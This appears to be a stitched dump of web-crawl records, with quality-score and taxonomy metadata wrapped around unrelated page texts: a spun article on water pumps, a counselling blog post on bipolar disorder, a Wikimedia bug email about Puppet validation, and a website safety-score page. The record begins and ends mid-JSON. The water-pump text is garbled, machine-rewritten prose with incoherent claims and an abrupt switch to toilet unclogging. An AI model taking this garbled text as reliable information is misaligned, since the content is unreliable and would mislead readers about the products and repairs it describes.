"rps_doc_frac_chars_dupe_10grams": 0,
"rps_doc_frac_chars_dupe_5grams": 0.010687019675970078,
"rps_doc_frac_chars_dupe_6grams": 0,
"rps_doc_frac_chars_dupe_7grams": 0,
"rps_doc_frac_chars_dupe_8grams": 0,
"rps_doc_frac_chars_dupe_9grams": 0,
"rps_doc_frac_chars_top_2gram": 0.013994909822940826,
"rps_doc_frac_chars_top_3gram": 0.00916031002998352,
"rps_doc_frac_chars_top_4gram": 0.00916031002998352,
"rps_doc_books_importance": -427.96875,
"rps_doc_books_importance_length_correction": -427.96875,
"rps_doc_openwebtext_importance": -247.53746032714844,
"rps_doc_openwebtext_importance_length_correction": -247.53746032714844,
"rps_doc_wikipedia_importance": -168.14443969726562,
"rps_doc_wikipedia_importance_length_correction": -168.14443969726562
},
"fasttext": {
"dclm": 0.06160480156540871,
"english": 0.9117668867111206,
"fineweb_edu_approx": 3.1570849418640137,
"eai_general_math": 0.03423076868057251,
"eai_open_web_math": 0.35655879974365234,
"eai_web_code": 0.0011145500466227531
}
}
|
{
"free_decimal_correspondence": {
"primary": {
"code": "616.858",
"labels": {
"level_1": "Industrial arts, Technology, and Engineering",
"level_2": "Medicine",
"level_3": "Pathology and Diseases"
}
},
"secondary": {
"code": "616.85",
"labels": {
"level_1": "Industrial arts, Technology, and Engineering",
"level_2": "Medicine",
"level_3": "Pathology and Diseases"
}
}
},
"bloom_cognitive_process": {
"primary": {
"code": "2",
"label": "Understand"
},
"secondary": {
"code": "3",
"label": "Apply"
}
},
"bloom_knowledge_domain": {
"primary": {
"code": "2",
"label": "Conceptual"
},
"secondary": {
"code": "3",
"label": "Procedural"
}
},
"document_type_v1": {
"primary": {
"code": "3",
"label": "Reference/Encyclopedic/Educational"
},
"secondary": {
"code": "2",
"label": "Academic/Research"
}
},
"extraction_artifacts": {
"primary": {
"code": "0",
"label": "No Artifacts"
},
"secondary": {
"code": "3",
"label": "Irrelevant Content"
}
},
"missing_content": {
"primary": {
"code": "0",
"label": "No missing content"
},
"secondary": {
"code": "4",
"label": "Missing Images or Figures"
}
},
"document_type_v2": {
"primary": {
"code": "10",
"label": "Knowledge Article"
},
"secondary": {
"code": "1",
"label": "About (Org.)"
}
},
"reasoning_depth": {
"primary": {
"code": "2",
"label": "Basic Reasoning"
},
"secondary": {
"code": "3",
"label": "Intermediate Reasoning"
}
},
"technical_correctness": {
"primary": {
"code": "3",
"label": "Mostly Correct"
},
"secondary": {
"code": "4",
"label": "Highly Correct"
}
},
"education_level": {
"primary": {
"code": "2",
"label": "High School Level"
},
"secondary": {
"code": "1",
"label": "General Audience"
}
}
}
|
71f077df794da2774531b20248bb19b0
|
4,451,743,698,802,421,000
|
Almost 70 in the past, the truly amazing plumber Doc Wolfe had a perception which he may probably might not have believed that it’s going to grow to be a very successful project years later. With the intentions to setup a pump that might be powered driven by a submersible electric motor, the theory has seen a company grow for an exporter of pumps such as waste water pump, de-watering trash pump, sump, magnetic drive pumps, garden water pump, sewage submersible pump, and low pressure sewer system. Rehau Rautitan The actual pumps, being mechanized kinds of apparatus, are likely to become the very first components you must handle as the tub gets more mature. Most of the actual pump troubles as well as failures are due to the upcoming factors: Poor water chemistry upkeep or failing to detect the first indications that this pump could possibly be going downhill. Unfortunately, spas repair companies can charge planet earth if the concern is in a position to cause irreparable damage.
How to Select the Suitable Water Pump
High end water pumps have become popular for their high durability, powerful, low downtime and cost-effective rates. There is no single water pump which is suited to every application. Today the marketplace comes with a massive amount water pumps. Here are few common forms of pumps available in industry: This brand has probably been probably the most installed pump in recreational vehicles for decades. While there are additional pumps, business held with that particular pump is dramatic. The 2088 water pump is the main pump utilized in just about all travel trailers built. I can not even start to suppose the amount of these pumps which have been sold. Shurflo, if I am not mistaken has led the since 1988. Get a bucket, closet auger, flange plunger in order to unclog the bathroom. Put water should you not see any water inside bowl and obtain gone plunger to drain it. Perform this if you realise the drain not quick enough or not draining in any way. If the plunger does not work well, utilize auger to drain it. Twist the crank clockwise and start pushing. Repeat it and if you discover an item, you can get against each other until the object is out.
|
{
"url": "http://www.discoveranywherecr.com/exploring-your-vehicles-water-pump/",
"source_domain": "www.discoveranywherecr.com",
"snapshot_id": "crawl=CC-MAIN-2019-47",
"warc_metadata": {
"Content-Length": "14709",
"Content-Type": "application/http; msgtype=response",
"WARC-Block-Digest": "sha1:XDNXJTD6XQPV4BJ6IAAY3WMYAZIATAMR",
"WARC-Concurrent-To": "<urn:uuid:9511ccd6-d7ed-43a6-91f1-cf7c87bb5abc>",
"WARC-Date": "2019-11-14T22:47:22Z",
"WARC-IP-Address": "163.172.16.45",
"WARC-Identified-Payload-Type": "text/html",
"WARC-Payload-Digest": "sha1:ZHJBYMR5WTCFZEHJEC4CPVK6NROMUQIQ",
"WARC-Record-ID": "<urn:uuid:4550a7d8-5eec-4d1d-9547-98799657dc48>",
"WARC-Target-URI": "http://www.discoveranywherecr.com/exploring-your-vehicles-water-pump/",
"WARC-Truncated": null,
"WARC-Type": "response",
"WARC-Warcinfo-ID": "<urn:uuid:6f6b76b8-9c3f-4f5d-90a6-3b69bb98df08>"
},
"warc_info": "isPartOf: CC-MAIN-2019-47\r\npublisher: Common Crawl\r\ndescription: Wide crawl of the web for November 2019\r\noperator: Common Crawl Admin ([email protected])\r\nhostname: ip-10-67-67-147.ec2.internal\r\nsoftware: Apache Nutch 1.16 (modified, https://github.com/commoncrawl/nutch/)\r\nrobots: checked via crawler-commons 1.1-SNAPSHOT (https://github.com/crawler-commons/crawler-commons)\r\nformat: WARC File Format 1.1\r\nconformsTo: http://iipc.github.io/warc-specifications/specifications/warc-format/warc-1.1/"
}
|
{
"line_start_idx": [
0,
992,
993,
1031,
1032
],
"line_end_idx": [
992,
993,
1031,
1032,
2194
]
}
|
{
"red_pajama_v2": {
"ccnet_original_length": 2194,
"ccnet_original_nlines": 4,
"rps_doc_curly_bracket": 0,
"rps_doc_ldnoobw_words": 0,
"rps_doc_lorem_ipsum": 0,
"rps_doc_stop_word_fraction": 0.4376470744609833,
"rps_doc_ut1_blacklist": 0,
"rps_doc_frac_all_caps_words": 0.004705879837274551,
"rps_doc_frac_lines_end_with_ellipsis": 0,
"rps_doc_frac_no_alph_words": 0.10823529213666916,
"rps_doc_frac_unique_words": 0.5857519507408142,
"rps_doc_mean_word_length": 4.675461769104004,
"rps_doc_num_sentences": 19,
"rps_doc_symbol_to_word_ratio": 0,
"rps_doc_unigram_entropy": 5.0088605880737305,
"rps_doc_word_count": 379,
"rps_doc_frac_chars_dupe_10grams": 0,
"rps_doc_frac_chars_dupe_5grams": 0,
"rps_doc_frac_chars_dupe_6grams": 0,
"rps_doc_frac_chars_dupe_7grams": 0,
"rps_doc_frac_chars_dupe_8grams": 0,
"rps_doc_frac_chars_dupe_9grams": 0,
"rps_doc_frac_chars_top_2gram": 0.02539503015577793,
"rps_doc_frac_chars_top_3gram": 0.010158009827136993,
"rps_doc_frac_chars_top_4gram": 0,
"rps_doc_books_importance": -256.6855773925781,
"rps_doc_books_importance_length_correction": -256.6855773925781,
"rps_doc_openwebtext_importance": -110.37239074707031,
"rps_doc_openwebtext_importance_length_correction": -110.37239074707031,
"rps_doc_wikipedia_importance": -88.52733612060547,
"rps_doc_wikipedia_importance_length_correction": -88.52733612060547
},
"fasttext": {
"dclm": 0.0817101001739502,
"english": 0.9609310030937195,
"fineweb_edu_approx": 1.7614257335662842,
"eai_general_math": 0.04233765974640846,
"eai_open_web_math": 0.09217215329408646,
"eai_web_code": 0.013844969682395458
}
}
|
{
"free_decimal_correspondence": {
"primary": {
"code": "621.8",
"labels": {
"level_1": "Industrial arts, Technology, and Engineering",
"level_2": "Engineering",
"level_3": "Mechanical engineering and Machinery"
}
},
"secondary": {
"code": "628.1",
"labels": {
"level_1": "Industrial arts, Technology, and Engineering",
"level_2": "Engineering",
"level_3": "Sanitary engineering, Sanitation, and Water-supply"
}
}
},
"bloom_cognitive_process": {
"primary": {
"code": "3",
"label": "Apply"
},
"secondary": {
"code": "2",
"label": "Understand"
}
},
"bloom_knowledge_domain": {
"primary": {
"code": "3",
"label": "Procedural"
},
"secondary": {
"code": "1",
"label": "Factual"
}
},
"document_type_v1": {
"primary": {
"code": "3",
"label": "Reference/Encyclopedic/Educational"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"extraction_artifacts": {
"primary": {
"code": "0",
"label": "No Artifacts"
},
"secondary": {
"code": "3",
"label": "Irrelevant Content"
}
},
"missing_content": {
"primary": {
"code": "0",
"label": "No missing content"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"document_type_v2": {
"primary": {
"code": "10",
"label": "Knowledge Article"
},
"secondary": {
"code": "23",
"label": "Tutorial"
}
},
"reasoning_depth": {
"primary": {
"code": "2",
"label": "Basic Reasoning"
},
"secondary": {
"code": "1",
"label": "No Reasoning"
}
},
"technical_correctness": {
"primary": {
"code": "3",
"label": "Mostly Correct"
},
"secondary": {
"code": "2",
"label": "Partially Correct"
}
},
"education_level": {
"primary": {
"code": "1",
"label": "General Audience"
},
"secondary": {
"code": "2",
"label": "High School Level"
}
}
}
|
71f077df794da2774531b20248bb19b0
|
-1,669,184,890,673,909,200
|
Bipolar Disorder, BBC Wilts, by Wendy Bramham
BIPOLAR DISORDER
Bipolar is also known as manic-depression or manic-depressive illness. This may be diagnosed by a psychiatrist if a person experiences extreme mood swings over a period of time, which in turn affects their ability to function in their everyday life. The illness, if untreated, can often be destructive to the person’s job, marriage and family life. These changes of mood are much more extreme than the normal ups and downs we all experience and which are part of normal life. The change in mood can happen within seconds, or over months, or a person can experience both simultaneously.
A person with bipolar will usually experience several of the following symptoms during a manic phase:
• a confidence, exhilaration and energy in the early phases but which can lead to a desperate restlessness, irritability and turbulence in the later phases
• a tendency to spend money they haven’t got, leading to serious debts
• sleep disturbance, and early waking which offers the person the opportunity to become excessively productive
• a feeling of “grandiosity” – feeling at the centre of the world, and as if nothing is impossible
• loss of any regularity in normal everyday activities
• disinhibition to the extreme
• rapid thinking and talking; a flight of ideas (one thought leading to another at a pace that is hard to keep up with); the need to communicate your ideas; dominating the conversation
• speech feels incredibly easy; sense of absolute vitality turbo charges speech
• imposing oneself on others, visiting and phoning to the point of exhausting the other
• a tendency to begin grand projects or ventures, often taking big risks
• a powerful feeling of connectedness between things
• the future holds much promise, with certainties of success, wealth and achievement
• senses are heightened, colours more vivid and contours better defined
• an unwavering belief in the goodness of the world
• behaving impulsively with activities such as drink, drugs or sex
• in the final stages of mania, a person may become suspicious of others, paranoid, and unwilling to be helped or treated as they are fixated on their own delusions of greatness
A depressive phase can be experienced as:
• an emptiness that is totally devastating
• unbearable loneliness, mental pain, terror or rage
• a sense of paralysis that makes simple everyday decisions, (such as what clothes to wear once you get out of bed, what direction to walk in, how to respond when someone greets them) seem impossible
• feelings of worthlessness and self-reproach, but also thoughts of how others have wronged them
• a feeling that human endeavour and achievement are meaningless
• suicidal thoughts
For further information about depression on its own, please see our other blogs.
Causes of Bipolar
Exact causes are not fully known although there is a strong family link. This is not just genetic inheritance, but perhaps more importantly it can also be caused by the experience of interacting with a parent who is bipolar. For example, a child can be frightened and confused by a parent’s unexpected and inconsistent mood changes. The child may learn that attachments are unstable and precarious. A parent who is bipolar may seek relationships which require dependency as a way of guaranteeing closeness; as a way of coping with an internal fragile sense of connection with others, and the fear of abandonment. This would then become problematic for the child as s/he becomes independent and the parent’s love collapses. Bipolar sufferers can often be children who have been earmarked to raise the family’s social status; the child may be burdened by these ideals, but conforms.
Mania can be triggered after a stressful or traumatic experience, such as a loss, a physical illness, or when something is too bad to think about. Such a trauma or loss may have happened many years previously. It is thought by psychotherapists that apparently arbitrary cycles of mania and depression are not accidental, but often the connection is not made in the conscious mind.
Getting Help
If you are worried, visit your GP in the first instance. He or she may then refer you to a psychiatrist. Getting help early is very important. Subsequently, if you do receive a diagnosis of bipolar you will be prescribed medication and also possibly offered some form of talking therapy. For those people who suffer debilitating depressive episodes, a manic phase can be a welcome relief! This is why it is very tempting for sufferers to either resist getting help in the first place, or to deny the need for medication.
It is helpful to:
• accept that you have a problem and receive help
• educate yourself about the condition, and where appropriate involve family or friends
• recognise the early warning signs around your symptoms, such as restlessness, changes in sleep patterns, etc. Gather support from family to help recognise these.
• share your experiences with others suffering from the same condition
• once your moods are more stable, seek a psychological therapy to talk through your feelings, the details of your highs and lows, to manage stress, and to explore your past in relation to your current difficulties.
• try to lead a healthy lifestyle and improve well-being, by incorporating exercise, sleep and good nutrition etc.
Wendy Bramham September 2013, for BBC Wiltshire series on mental health
References:
Advertisements
One thought on “Bipolar Disorder, BBC Wilts, by Wendy Bramham
1. Pingback: Wendy Bramham on Radio Wiltshire | Wendy Bramham Associates
Leave a Reply
Fill in your details below or click an icon to log in:
WordPress.com Logo
You are commenting using your WordPress.com account. Log Out / Change )
Twitter picture
You are commenting using your Twitter account. Log Out / Change )
Facebook photo
You are commenting using your Facebook account. Log Out / Change )
Google+ photo
You are commenting using your Google+ account. Log Out / Change )
Connecting to %s
|
{
"url": "https://wendybramham.wordpress.com/2013/09/04/bipolar-disorder/",
"source_domain": "wendybramham.wordpress.com",
"snapshot_id": "crawl=CC-MAIN-2017-30",
"warc_metadata": {
"Content-Length": "109002",
"Content-Type": "application/http; msgtype=response",
"WARC-Block-Digest": "sha1:XIIZ5CITQLDYO4HM2H64XTQYABGSP3D6",
"WARC-Concurrent-To": "<urn:uuid:96bc1d01-b18f-4209-8a11-51f126a51166>",
"WARC-Date": "2017-07-21T06:37:21Z",
"WARC-IP-Address": "192.0.78.13",
"WARC-Identified-Payload-Type": "text/html",
"WARC-Payload-Digest": "sha1:XHUFEJ3VURQX25JNLTGXKBWNS6CQTFLE",
"WARC-Record-ID": "<urn:uuid:fcfa7e8f-1b09-483d-922c-f12e406f08cd>",
"WARC-Target-URI": "https://wendybramham.wordpress.com/2013/09/04/bipolar-disorder/",
"WARC-Truncated": "length",
"WARC-Type": "response",
"WARC-Warcinfo-ID": "<urn:uuid:15fe3a50-ef25-4ceb-9610-699a8e3bf4a0>"
},
"warc_info": "robots: classic\r\nhostname: ip-10-145-168-171.ec2.internal\r\nsoftware: Nutch 1.6 (CC)\r\nisPartOf: CC-MAIN-2017-30\r\noperator: Common Crawl Admin\r\ndescription: Wide crawl of the web for July 2017\r\npublisher: Common Crawl\r\nformat: WARC File Format 1.0\r\nconformsTo: http://bibnum.bnf.fr/WARC/WARC_ISO_28500_version1_latestdraft.pdf"
}
|
{
"line_start_idx": [
0,
46,
47,
64,
65,
655,
656,
758,
759,
917,
990,
1103,
1204,
1261,
1294,
1481,
1563,
1653,
1728,
1783,
1870,
1944,
1998,
2067,
2247,
2248,
2290,
2291,
2336,
2391,
2593,
2692,
2759,
2781,
2782,
2863,
2864,
2882,
2883,
3772,
3773,
4156,
4157,
4170,
4171,
4697,
4698,
4716,
4717,
4769,
4859,
5026,
5099,
5317,
5434,
5435,
5507,
5508,
5520,
5521,
5536,
5537,
5599,
5600,
5675,
5676,
5690,
5691,
5746,
5747,
5766,
5767,
5839,
5840,
5856,
5857,
5923,
5924,
5939,
5940,
6007,
6008,
6022,
6023,
6089,
6090
],
"line_end_idx": [
46,
47,
64,
65,
655,
656,
758,
759,
917,
990,
1103,
1204,
1261,
1294,
1481,
1563,
1653,
1728,
1783,
1870,
1944,
1998,
2067,
2247,
2248,
2290,
2291,
2336,
2391,
2593,
2692,
2759,
2781,
2782,
2863,
2864,
2882,
2883,
3772,
3773,
4156,
4157,
4170,
4171,
4697,
4698,
4716,
4717,
4769,
4859,
5026,
5099,
5317,
5434,
5435,
5507,
5508,
5520,
5521,
5536,
5537,
5599,
5600,
5675,
5676,
5690,
5691,
5746,
5747,
5766,
5767,
5839,
5840,
5856,
5857,
5923,
5924,
5939,
5940,
6007,
6008,
6022,
6023,
6089,
6090,
6106
]
}
|
{
"red_pajama_v2": {
"ccnet_original_length": 6106,
"ccnet_original_nlines": 85,
"rps_doc_curly_bracket": 0,
"rps_doc_ldnoobw_words": 1,
"rps_doc_lorem_ipsum": 0,
"rps_doc_stop_word_fraction": 0.43617022037506104,
"rps_doc_ut1_blacklist": 0,
"rps_doc_frac_all_caps_words": 0.007978719659149647,
"rps_doc_frac_lines_end_with_ellipsis": 0,
"rps_doc_frac_no_alph_words": 0.14007091522216797,
"rps_doc_frac_unique_words": 0.45803841948509216,
"rps_doc_mean_word_length": 4.935287952423096,
"rps_doc_num_sentences": 34,
"rps_doc_symbol_to_word_ratio": 0,
"rps_doc_unigram_entropy": 5.485457420349121,
"rps_doc_word_count": 989,
"rps_doc_frac_chars_dupe_10grams": 0,
"rps_doc_frac_chars_dupe_5grams": 0.04261422157287598,
"rps_doc_frac_chars_dupe_6grams": 0.02458512969315052,
"rps_doc_frac_chars_dupe_7grams": 0,
"rps_doc_frac_chars_dupe_8grams": 0,
"rps_doc_frac_chars_dupe_9grams": 0,
"rps_doc_frac_chars_top_2gram": 0.0028682600241154432,
"rps_doc_frac_chars_top_3gram": 0.01311207003891468,
"rps_doc_frac_chars_top_4gram": 0.01720958948135376,
"rps_doc_books_importance": -450.128173828125,
"rps_doc_books_importance_length_correction": -450.128173828125,
"rps_doc_openwebtext_importance": -283.1889343261719,
"rps_doc_openwebtext_importance_length_correction": -283.1889343261719,
"rps_doc_wikipedia_importance": -168.0266876220703,
"rps_doc_wikipedia_importance_length_correction": -168.0266876220703
},
"fasttext": {
"dclm": 0.03389381989836693,
"english": 0.93958979845047,
"fineweb_edu_approx": 2.884032726287842,
"eai_general_math": 0.00046897001448087394,
"eai_open_web_math": 0.17647212743759155,
"eai_web_code": 0.0000159699993673712
}
}
|
{
"free_decimal_correspondence": {
"primary": {
"code": "616.8522",
"labels": {
"level_1": "Industrial arts, Technology, and Engineering",
"level_2": "Medicine",
"level_3": "Pathology and Diseases"
}
},
"secondary": {
"code": "616.852",
"labels": {
"level_1": "Industrial arts, Technology, and Engineering",
"level_2": "Medicine",
"level_3": "Pathology and Diseases"
}
}
},
"bloom_cognitive_process": {
"primary": {
"code": "2",
"label": "Understand"
},
"secondary": {
"code": "3",
"label": "Apply"
}
},
"bloom_knowledge_domain": {
"primary": {
"code": "2",
"label": "Conceptual"
},
"secondary": {
"code": "3",
"label": "Procedural"
}
},
"document_type_v1": {
"primary": {
"code": "3",
"label": "Reference/Encyclopedic/Educational"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"extraction_artifacts": {
"primary": {
"code": "3",
"label": "Irrelevant Content"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"missing_content": {
"primary": {
"code": "0",
"label": "No missing content"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"document_type_v2": {
"primary": {
"code": "10",
"label": "Knowledge Article"
},
"secondary": {
"code": "16",
"label": "Personal Blog"
}
},
"reasoning_depth": {
"primary": {
"code": "2",
"label": "Basic Reasoning"
},
"secondary": {
"code": "3",
"label": "Intermediate Reasoning"
}
},
"technical_correctness": {
"primary": {
"code": "3",
"label": "Mostly Correct"
},
"secondary": {
"code": "4",
"label": "Highly Correct"
}
},
"education_level": {
"primary": {
"code": "1",
"label": "General Audience"
},
"secondary": {
"code": "2",
"label": "High School Level"
}
}
}
|
71f077df794da2774531b20248bb19b0
|
1,805,557,371,395,530,000
|
https://bugzilla.wikimedia.org/show_bug.cgi?id=59980
Antoine "hashar" Musso <[email protected]> changed:
What |Removed |Added
----------------------------------------------------------------------------
Status|UNCONFIRMED |NEW
Summary|jenkins-bot verified an |'puppet parser validate'
|invalid puppet manifest in |does not catch common typos
|gerrit |
Ever confirmed|0 |1
--- Comment #1 from Antoine "hashar" Musso <[email protected]> ---
The Jenkins job operations-puppet-validate is running the command 'puppet
parser validate' on each .pp file. That command does not detect such issue:
$ echo "file { '/tmp/foo': wner => 'root' }"|puppet parser validate; echo $?
0
$
So that is valid as far as puppet parser is concerned.
Such issue might be caught by compiling the catalog, I am not sure how we can
achieve that though.
Rephrased summary.
--
You are receiving this mail because:
You are the assignee for the bug.
You are on the CC list for the bug.
_______________________________________________
Wikibugs-l mailing list
[email protected]
https://lists.wikimedia.org/mailman/listinfo/wikibugs-l
Reply via email to
|
{
"url": "https://www.mail-archive.com/[email protected]/msg327353.html",
"source_domain": "www.mail-archive.com",
"snapshot_id": "crawl=CC-MAIN-2018-26",
"warc_metadata": {
"Content-Length": "9002",
"Content-Type": "application/http; msgtype=response",
"WARC-Block-Digest": "sha1:PGVI3UUU4AWMF7CK6ACASSGEMX7ZM7U5",
"WARC-Concurrent-To": "<urn:uuid:770d3909-1209-4d32-8e1f-c453773d7769>",
"WARC-Date": "2018-06-23T22:11:43Z",
"WARC-IP-Address": "72.52.77.8",
"WARC-Identified-Payload-Type": "text/html",
"WARC-Payload-Digest": "sha1:GACVP2P4ZYEYBUXLLZ4DZGP7AVIPQ7X3",
"WARC-Record-ID": "<urn:uuid:16e44bed-7cf2-4dce-82f3-361ba745bc5f>",
"WARC-Target-URI": "https://www.mail-archive.com/[email protected]/msg327353.html",
"WARC-Truncated": null,
"WARC-Type": "response",
"WARC-Warcinfo-ID": "<urn:uuid:ae02c443-c06f-442d-b739-3563fea365b3>"
},
"warc_info": "robots: classic\r\nhostname: ip-10-168-124-187.ec2.internal\r\nsoftware: Nutch 1.6 (CC)\r\nisPartOf: CC-MAIN-2018-26\r\noperator: Common Crawl Admin\r\ndescription: Wide crawl of the web for June 2018\r\npublisher: Common Crawl\r\nformat: WARC File Format 1.0\r\nconformsTo: http://bibnum.bnf.fr/WARC/WARC_ISO_28500_version1_latestdraft.pdf"
}
|
{
"line_start_idx": [
0,
53,
54,
103,
104,
159,
236,
289,
363,
440,
490,
541,
542,
606,
680,
757,
758,
759,
837,
840,
843,
844,
899,
900,
901,
902,
980,
1001,
1002,
1021,
1022,
1026,
1063,
1097,
1133,
1181,
1205,
1236,
1292,
1293
],
"line_end_idx": [
53,
54,
103,
104,
159,
236,
289,
363,
440,
490,
541,
542,
606,
680,
757,
758,
759,
837,
840,
843,
844,
899,
900,
901,
902,
980,
1001,
1002,
1021,
1022,
1026,
1063,
1097,
1133,
1181,
1205,
1236,
1292,
1293,
1311
]
}
|
{
"red_pajama_v2": {
"ccnet_original_length": 1311,
"ccnet_original_nlines": 39,
"rps_doc_curly_bracket": 0.001525550032965839,
"rps_doc_ldnoobw_words": 0,
"rps_doc_lorem_ipsum": 0,
"rps_doc_stop_word_fraction": 0.2033195048570633,
"rps_doc_ut1_blacklist": 0,
"rps_doc_frac_all_caps_words": 0.016597509384155273,
"rps_doc_frac_lines_end_with_ellipsis": 0,
"rps_doc_frac_no_alph_words": 0.34854772686958313,
"rps_doc_frac_unique_words": 0.689393937587738,
"rps_doc_mean_word_length": 5.75,
"rps_doc_num_sentences": 21,
"rps_doc_symbol_to_word_ratio": 0.012448130175471306,
"rps_doc_unigram_entropy": 4.358790874481201,
"rps_doc_word_count": 132,
"rps_doc_frac_chars_dupe_10grams": 0,
"rps_doc_frac_chars_dupe_5grams": 0,
"rps_doc_frac_chars_dupe_6grams": 0,
"rps_doc_frac_chars_dupe_7grams": 0,
"rps_doc_frac_chars_dupe_8grams": 0,
"rps_doc_frac_chars_dupe_9grams": 0,
"rps_doc_frac_chars_top_2gram": 0.06324110925197601,
"rps_doc_frac_chars_top_3gram": 0.07905138283967972,
"rps_doc_frac_chars_top_4gram": 0.07114624977111816,
"rps_doc_books_importance": -93.89696502685547,
"rps_doc_books_importance_length_correction": -93.89696502685547,
"rps_doc_openwebtext_importance": -62.04476547241211,
"rps_doc_openwebtext_importance_length_correction": -62.04476547241211,
"rps_doc_wikipedia_importance": -22.446929931640625,
"rps_doc_wikipedia_importance_length_correction": -22.44689178466797
},
"fasttext": {
"dclm": 0.30071282386779785,
"english": 0.6616323590278625,
"fineweb_edu_approx": 1.3873004913330078,
"eai_general_math": 0.02710605040192604,
"eai_open_web_math": 0.15247368812561035,
"eai_web_code": 0.005026699975132942
}
}
|
{
"free_decimal_correspondence": {
"primary": {
"code": "005.4",
"labels": {
"level_1": "General works, books and libraries, information sciences",
"level_2": "",
"level_3": "Computer programming"
}
},
"secondary": {
"code": "004.02",
"labels": {
"level_1": "General works, books and libraries, information sciences",
"level_2": "",
"level_3": "Computers and Computer science"
}
}
},
"bloom_cognitive_process": {
"primary": {
"code": "2",
"label": "Understand"
},
"secondary": {
"code": "4",
"label": "Analyze"
}
},
"bloom_knowledge_domain": {
"primary": {
"code": "2",
"label": "Conceptual"
},
"secondary": {
"code": "3",
"label": "Procedural"
}
},
"document_type_v1": {
"primary": {
"code": "5",
"label": "Social/Forum"
},
"secondary": {
"code": "3",
"label": "Reference/Encyclopedic/Educational"
}
},
"extraction_artifacts": {
"primary": {
"code": "3",
"label": "Irrelevant Content"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"missing_content": {
"primary": {
"code": "0",
"label": "No missing content"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"document_type_v2": {
"primary": {
"code": "8",
"label": "Documentation"
},
"secondary": {
"code": "21",
"label": "Customer Support"
}
},
"reasoning_depth": {
"primary": {
"code": "2",
"label": "Basic Reasoning"
},
"secondary": {
"code": "3",
"label": "Intermediate Reasoning"
}
},
"technical_correctness": {
"primary": {
"code": "3",
"label": "Mostly Correct"
},
"secondary": {
"code": "4",
"label": "Highly Correct"
}
},
"education_level": {
"primary": {
"code": "3",
"label": "Undergraduate Level"
},
"secondary": {
"code": "4",
"label": "Graduate/Expert Level"
}
}
}
|
71f077df794da2774531b20248bb19b0
|
-5,894,423,125,052,588,000
|
Is
safe for your PC?
Is mynortonaccount.com safe or is it scam?
Domain is Safe
Safe score: 1
The higher the number, the more dangerous the website.
Any number higher than 1 means DANGER.
Positive votes:
1
Negative votes:
0
mynortonaccount.com review
Have you had bad experience with mynortonaccount.com? Warn us, please!
|
{
"url": "https://www.iswebsitesafe.net/d/mynortonaccount.com",
"source_domain": "www.iswebsitesafe.net",
"snapshot_id": "crawl=CC-MAIN-2018-09",
"warc_metadata": {
"Content-Length": "25740",
"Content-Type": "application/http; msgtype=response",
"WARC-Block-Digest": "sha1:P36TRPTMDEUIW7TNH7LIQUKKVNA5BUUA",
"WARC-Concurrent-To": "<urn:uuid:b2361eb0-7d9c-4dd6-beb6-aa706fa865e0>",
"WARC-Date": "2018-02-23T14:07:20Z",
"WARC-IP-Address": "104.27.160.134",
"WARC-Identified-Payload-Type": "text/html",
"WARC-Payload-Digest": "sha1:ZE4SVKPQ2BCIJB4B7WDQT2EYLV2YAAQC",
"WARC-Record-ID": "<urn:uuid:b052614d-0ed9-44c9-9620-ed9685de434b>",
"WARC-Target-URI": "https://www.iswebsitesafe.net/d/mynortonaccount.com",
"WARC-Truncated": "length",
"WARC-Type": "response",
"WARC-Warcinfo-ID": "<urn:uuid:78a025f0-5de7-4828-9814-4cfac5e55f53>"
},
"warc_info": "robots: classic\r\nhostname: ip-10-170-163-162.ec2.internal\r\nsoftware: Nutch 1.6 (CC)\r\nisPartOf: CC-MAIN-2018-09\r\noperator: Common Crawl Admin\r\ndescription: Wide crawl of the web for February 2018\r\npublisher: Common Crawl\r\nformat: WARC File Format 1.0\r\nconformsTo: http://bibnum.bnf.fr/WARC/WARC_ISO_28500_version1_latestdraft.pdf"
}
|
{
"line_start_idx": [
0,
3,
21,
64,
79,
93,
94,
149,
188,
189,
205,
207,
223,
225,
226,
253,
254
],
"line_end_idx": [
3,
21,
64,
79,
93,
94,
149,
188,
189,
205,
207,
223,
225,
226,
253,
254,
324
]
}
|
{
"red_pajama_v2": {
"ccnet_original_length": 324,
"ccnet_original_nlines": 16,
"rps_doc_curly_bracket": 0,
"rps_doc_ldnoobw_words": 0,
"rps_doc_lorem_ipsum": 0,
"rps_doc_stop_word_fraction": 0.2753623127937317,
"rps_doc_ut1_blacklist": 0,
"rps_doc_frac_all_caps_words": 0.028985509648919106,
"rps_doc_frac_lines_end_with_ellipsis": 0,
"rps_doc_frac_no_alph_words": 0.260869562625885,
"rps_doc_frac_unique_words": 0.692307710647583,
"rps_doc_mean_word_length": 4.903846263885498,
"rps_doc_num_sentences": 9,
"rps_doc_symbol_to_word_ratio": 0,
"rps_doc_unigram_entropy": 3.424588203430176,
"rps_doc_word_count": 52,
"rps_doc_frac_chars_dupe_10grams": 0,
"rps_doc_frac_chars_dupe_5grams": 0,
"rps_doc_frac_chars_dupe_6grams": 0,
"rps_doc_frac_chars_dupe_7grams": 0,
"rps_doc_frac_chars_dupe_8grams": 0,
"rps_doc_frac_chars_dupe_9grams": 0,
"rps_doc_frac_chars_top_2gram": 0.047058820724487305,
"rps_doc_frac_chars_top_3gram": 0,
"rps_doc_frac_chars_top_4gram": 0,
"rps_doc_books_importance": -22.094573974609375,
"rps_doc_books_importance_length_correction": -22.094573974609375,
"rps_doc_openwebtext_importance": -12.54629898071289,
"rps_doc_openwebtext_importance_length_correction": -12.54629898071289,
"rps_doc_wikipedia_importance": 2.661815643310547,
"rps_doc_wikipedia_importance_length_correction": 2.661815643310547
},
"fasttext": {
"dclm": 0.7922013401985168,
"english": 0.8718928098678589,
"fineweb_edu_approx": 1.4402997493743896,
"eai_general_math": 0.0019360800506547093,
"eai_open_web_math": 0.044459160417318344,
"eai_web_code": 0.0009827000321820378
}
}
|
{
"free_decimal_correspondence": {
"primary": {
"code": "005.82",
"labels": {
"level_1": "General works, books and libraries, information sciences",
"level_2": "",
"level_3": "Computer programming"
}
},
"secondary": {
"code": "004.67",
"labels": {
"level_1": "General works, books and libraries, information sciences",
"level_2": "",
"level_3": "Computers and Computer science"
}
}
},
"bloom_cognitive_process": {
"primary": {
"code": "5",
"label": "Evaluate"
},
"secondary": {
"code": "2",
"label": "Understand"
}
},
"bloom_knowledge_domain": {
